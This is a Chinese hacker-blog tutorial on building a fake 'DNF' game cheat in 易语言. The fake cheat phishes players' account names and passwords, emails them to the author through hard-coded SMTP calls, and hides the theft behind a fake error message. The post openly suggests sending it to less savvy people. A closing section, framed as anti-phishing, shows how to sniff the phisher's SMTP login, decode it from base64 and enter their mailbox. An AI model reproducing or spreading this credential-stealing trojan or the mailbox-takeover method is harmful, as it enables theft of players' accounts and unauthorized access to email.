危险漫步博客
新鲜的“黑客思维”就是从全新的角度看待黑客技术,从更高的层面去思考;专注于黑客精神及技术交流分享的独立博客。
文章2304 浏览18595011

DNF外挂

现在编写外挂的人越来越多,但是当你使用这些外挂的时候,你是否知道你的账号和密码在你不经意的情况下已经发到别人的邮箱里去了,接下来就由危险漫步为大家讲解一下如何编写一个仿钓鱼外挂与南部反钓鱼的方法。

我们需要以下几款软件:

(1)易语言

(2)嗅探器

“易语言”想必大家都很清楚是什么吧,网上也有很多下载的地址,在这里我就不给大家介绍了,“嗅探工具”就是探测这个外挂是不是在你输入完账号或密码的情况下把你的账号和密码发到编写外挂人的邮箱里去了。

易语言和嗅探工具的安装很简单,在这里我就不想大家一一介绍了,接下来我们就来编写一个“仿钓鱼外挂”和“嗅探器”的使用。

首先,我们要运行“易语言”,运行以后会出现一个框。我们点击“Windows窗口程序”-“启动后不再显示此对话框”-“确定”,完成以后我们会得到一个这样的界面。

现在,我们开始进行设置这个外挂的运行界面了,在这里我就以DNF为例设置一个运行界面,我们要设置这个运行界面首先要有一个标题,在哪里写一个标题呢?我们可在“启动窗口”这个框下的“标题”的右面输入运行界面的标题,这里我就输入“DNF无敌外挂”,虽然有标题了,但是,这样有点不美观,我们是不是应该在在这个标题前面加一个图标啊,我们还是在“启动窗口”这个框下的“图标”的右边插入一个图标文件,这个图标文件网上有很多,在这里我就不太详细地说了,我随便插入一个图标文件,插入完以后,这个运行界面的标题栏我们就算做完了,我们还可以在“启动窗口”这个框下“底色”这一处选择这个外挂的运行界面的背景,接下来我们为了让这个外挂的运行界面更加的美观,使用户更加的相信这个外挂是否是真实的,我们需要几个单选框和几个按钮。

首先我们先创建几个选择框,我们可以在“基本组件”的框下单击“选择框”然后再运行界面上拖动几个选择框,在这里我就拖动了五个,有了这些“选择框”我们为了使这个外挂真实,我们点击第一个“选择框”在编辑框一栏中我们“标题”的右边填写你想让这个外挂实现的功能,根据《地下城与勇士》这个游戏,玩家很反感疲劳,因为疲劳一到就刷不了图了,所以我填写的是“无限疲劳”我们为了做的真是一点,我们可以把文本颜色改成显眼的颜色(我个人认为改成红色)把背景颜色也改成与标题背景颜色相符的(我个人认为改成黑色),这样就能引诱用户使用本外挂,依此类推,下面的也可以根据以上的的方法来进行进行操作,为了让这个外挂做得更美观一点我们可以插入一张图片,这个让发很简单在“基本组件”这一框里点击“图片框”我们即可插入你想要的图片了,这个和上面说的差不多,在这里我也不多说了,我随便插入一个图片。

我们写这个仿钓鱼外挂的目的是什么?就是获取对方的账号和密码,接下来,我们开始添加输入“账号”和“密码”的框,方法很简单,我们先单击“基本组件”的框下的“按钮”我们拖动两个,然后我们点击第一个“按钮”在左面的框中“标题”的右面填写“请输入账号”然后在点击第二个“按钮”在左面的框中“标题”的右面填写“其输入密码”,光有这两个“请输入账号”和“请输入密码”还是不行的,我们点击“基本组件”框下的“编辑框”拖动出来两个,分别放在“请输入账号”和“请输入密码”的后面,这样就能够输入账号和密码了,但是,我们在这两个编辑框里面可以无限制的输入数字和字母,这样会暴露我们我们这个外挂是假的,所以我们点击“请输入账号”后面的“编辑框”,在左面的框中“最大允许长度”右面输入“10”,然后在“输入方式”的右面选择“整数文本输入”,这样,这个“编辑框”内只能输入10个数字了,下面,我们点击“请输入密码”后面的“编辑框”在左面的框中“最大允许长度”的右面输入“16”因为密码最大长度就是十六位,然后我们在“输入方式”的右面选择“密码输入”在“密码输入方式”的右面输入“+”。最后,我们点击“基本组件”框下的“按钮”拖动两个按钮出来,然后分别在第一个按钮的“标题”输入“确定”,在第二个按钮的“标题”输入“关闭”因为这个和上面的操作很相似,所以在这里我就不给大家截图了,好了,到了这一步这个“防钓鱼外挂”的运行界面就算完成了。

接下来我们开始填写代码,我们双击按钮“确定”,我们在这里输入“信息框(“您输入的账号或密码错误,请检查大小写是否正确。”)”,(问:为什么要在运行界面“确定”下添加这样的一条代码呢?  答:万一用户输入的账号和密码是瞎打上的呢,他一运行没有提示,用户会怀疑这个外挂是否是真的,所以我们必须在按钮“确定”下添加以上这条代码。)然后,我们在运行界面中双击按钮“关闭”我们在这里输入“销毁”。为了试验我们填写的代码是否能达到以上说的效果,我们试验一下,我们在“启动窗口”。

接下来就是我们添加代码中最难得一个了,我们在双击“启动窗口”中的“确定”按钮,我们在工具栏中点击“工具”下的“支持库配置”我们在这里选择“互联网支持库2.0版”然后点“确定”,然后我们在这里添加以下代码:

连接发信服务器(“这里输入发信邮件服务器地址,这个邮箱必须支持pop3、stmp才行”,25,“这里输入用户名”,“这里输入密码”,

发送邮件(编辑框1.内容,编辑框1.内容+“…,”+编辑框2.内容,“这里输入收信人邮箱地址”…“这里是输入发信人邮箱地址”,)到这里我们就添加完代码了,接下来我们就来试验一下,看看是否能实现这个功能。

我们在“工具栏”中点击“编译”里面的“静态编译”,然后放在你想要的位置上就行了,我们也可以把这个“防钓鱼外挂”发给一些网络能力比较差的的人,当他们输入账号和密码的同时却不知道自己的账号和密码已经被发送到你的邮箱里面了,到了这里我们把“仿写钓鱼外挂”这个软件写完了,我们使用外挂的时候不知道这个外挂是否是钓鱼外挂,这个时候我们就可以使用“嗅探器”来探测一下这个外挂是否是钓鱼外挂。

接下来,我们就进行如何使用“唉探器”来判断这个外挂是否是钓鱼外挂,查看它把我们的账号和密码都发送到哪个邮箱里面去了,我们是否能找到那个邮箱的密码,下面我就给大家讲解什么事反钓鱼,反钓鱼都有什么作用,首先我们必须知道什么是嗅探器?

嗅探器是可以窃听网络上流经的数据包。用集线器hub组建的网络是基于共享的原理的,局域网内所有的计算机都接收相同的数据包。

网上嗅探器有很多,我在这里就给大家提供一个我认为很好的嗅探器,嗅探器在关盘里有兴趣的可以在光盘里面下载,知道了什么是嗅探器,而我们现在也必须知道stmp、pop3、ftp服务端口,stmp:(简单邮件传输协议)负责邮件的发送和传输POP3: (Post Office Protocol)邮局协议pop邮箱是在web页面的一种收信方式,他可以将其它信箱里面的信件全部都收到目前这个邮箱中,类似于客户端收信的形式。

POP3是邮件邮局协议第三代(post office protcol)的缩写,是绝大多数邮件收发程序使用的协议,接收邮件时,一般都使用该协议。在服务器上的电子信函邮件箱,你能便用像Outlook,OutlookExpress、Foxmail和Netcape Mail等邮件程序直接访问你的邮件。每一个POP3账号都有自己的密码,不论你在哪一个地方连上互联网都可以检查你的邮件。

知道了“stmp、pop3、ftp服务端口”会对我们接下来的实验会有很大的帮助的。

我们可以试验一下我们写的这个“防钓鱼外挂”是否能被“嗅探器”查到和探测到发送邮箱的密码,首先,我们先运行我们已经写好的“DNF-敌外挂”,当我们选择好功能和输入账号、密码的时候,我们运行“嗅探器”然后再运行我们写好的“仿钓鱼外挂”,我们在那个外挂的运行界面写好账号和密码以后,我们打开“嗅探工具”点击菜单栏中的“Capture”- ->“Interfaces...”然后我们在菜单栏中的“Filter”框的后面填写“smtp”我们会看见很多数据,我们在“Info”这一列中寻找后面带“=”的代码,找到以后,我们右键点击选择“follow TCP Stream”点击以后我们等待一会,等待加载到100%会出现一个标题为“followTCP Stream”界面,在这里我们注意一下红颜色的字,第一个框中的代码是最为重要的,这条代码是用了base64加密过的所以,只要我们吧这条代码解密以后就会知道发送邮箱的密码了,第二个框的意思就是“寄信者的地址”第三个框的意思是“收件人的地址”第四个框的意思就是属于正文了来自于的邮件,我们可以通过解密的方法进入对方的收件邮箱,来获取使用这个外挂人的账号和密码,到这里基本上已经结束了,在这里我还是要提醒大家,在你使用外挂的时候一定要用“唉探器”查看一下,这个外挂是不是钓鱼外挂,如果是的话,那你就幸运了。